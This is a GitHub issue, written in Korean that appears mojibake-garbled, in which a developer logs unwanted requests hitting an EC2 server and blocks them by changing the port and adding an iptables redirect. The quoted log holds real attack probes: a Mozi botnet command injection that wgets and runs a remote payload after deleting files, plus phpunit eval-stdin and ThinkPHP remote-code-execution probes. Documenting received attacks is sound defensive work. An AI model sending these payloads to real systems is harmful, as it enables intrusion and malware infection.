Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[πŸ”§ Back-End Error] #3 / EC2 μ˜λ„μΉ˜ μ•Šμ€ μš”μ²­ 차단 / 2021-09-30 #277

Open
mniYUNSU opened this issue Sep 30, 2021 · 0 comments
Open

[πŸ”§ Back-End Error] #3 / EC2 μ˜λ„μΉ˜ μ•Šμ€ μš”μ²­ 차단 / 2021-09-30 #277

mniYUNSU opened this issue Sep 30, 2021 · 0 comments
Assignees
@minjman2659 @mniYUNSU
Labels
Back-End Back-End Tasks Error Error

Comments

@mniYUNSU
Copy link
Collaborator

mniYUNSU commented Sep 30, 2021
edited
Loading

μ–΄λ–€ μ—λŸ¬μΈκ°€μš”?

  • 배포 ν™˜κ²½μ—μ„œ EC2 μ„œλ²„ λ‘œκ·Έμ— μ˜λ„μΉ˜ μ•Šμ€ μš”μ²­μ΄ 찍힌걸 확인

μ—λŸ¬ λ©”μ‹œμ§€

GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.206 ms - 10
GET /.env 404 0.211 ms 
POST /Autodiscover/Autodiscover.xml 404 0.214 ms - 10
GET /wp-content/plugins/wp-file-manager/readme.txt 404 0.228 ms - 10
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 0.205 ms - 10
POST /api/jsonws/invoke 404 0.168 ms - 10
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 404 0.199 ms - 10
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 0.210 ms - 10

GET /?XDEBUG_SESSION_START=phpstorm 200 0.221 ms - 12

POST /mifs/.;/services/LogService 404 0.217 ms - 10
GET /console/ 404 0.225 ms - 10
GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.206 ms - 10
GET /.env 404 0.211 ms - 10

μ—λŸ¬ 핸듀링 방법

  • ν™˜κ²½ λ³€μˆ˜λ‘œ μ„€μ •ν–ˆλ˜ μ„œλ²„ 포트인 80을 λ³€κ²½ν–ˆλ‹€. EC2 μΈλ°”μš΄λ“œ κ·œμΉ™μ— μƒˆλ‘œμš΄ 포트λ₯Ό μΆ”κ°€ν–ˆκ³ , μ„œλ²„μ˜ ν™˜κ²½ λ³€μˆ˜λ₯Ό μƒˆλ‘œ μΆ”κ°€ν•œ 포트 번호둜 λ³€κ²½ν–ˆλ‹€.
  • CloudFrontλŠ” 80번 포트 μ‘λ‹΅λ§Œ HTTPS 둜 λ°”κΏ”μ£ΌκΈ° λ•Œλ¬Έμ—, μƒˆλ‘­κ²Œ μΆ”κ°€ν•œ 포트λ₯Ό 80번 포트둜 ν¬μ›Œλ”© μ‹œν‚€λŠ” 과정이 μΆ”κ°€λ‘œ ν•„μš”ν–ˆλ‹€.
sudo iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 80 -j REDIRECT --to-port λ‚΄κ°€ μΆ”κ°€ν•œ 포트

μ—λŸ¬ 핸듀링을 μœ„ν•΄ μ°Έκ³ ν•œ 레퍼런슀 링크

μ•„κ³ λΌμŠ€ν…Œμ΄μΈ 
@mniYUNSU mniYUNSU added Completed Task or Issue Completed Back-End Back-End Tasks Error Error labels Sep 30, 2021
@mniYUNSU mniYUNSU self-assigned this Sep 30, 2021
@minjman2659 minjman2659 self-assigned this Oct 1, 2021
@minjman2659 minjman2659 changed the title [πŸ”§ Back-End Error] #2 / EC2 μ˜λ„μΉ˜ μ•Šμ€ μš”μ²­ 차단 / 2021-09-30 [πŸ”§ Back-End Error] #3 / EC2 μ˜λ„μΉ˜ μ•Šμ€ μš”μ²­ 차단 / 2021-09-30 Oct 1, 2021
@minjman2659 minjman2659 removed the Completed Task or Issue Completed label Oct 1, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@minjman2659 minjman2659

@mniYUNSU mniYUNSU

Labels
Back-End Back-End Tasks Error Error
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@minjman2659 @mniYUNSU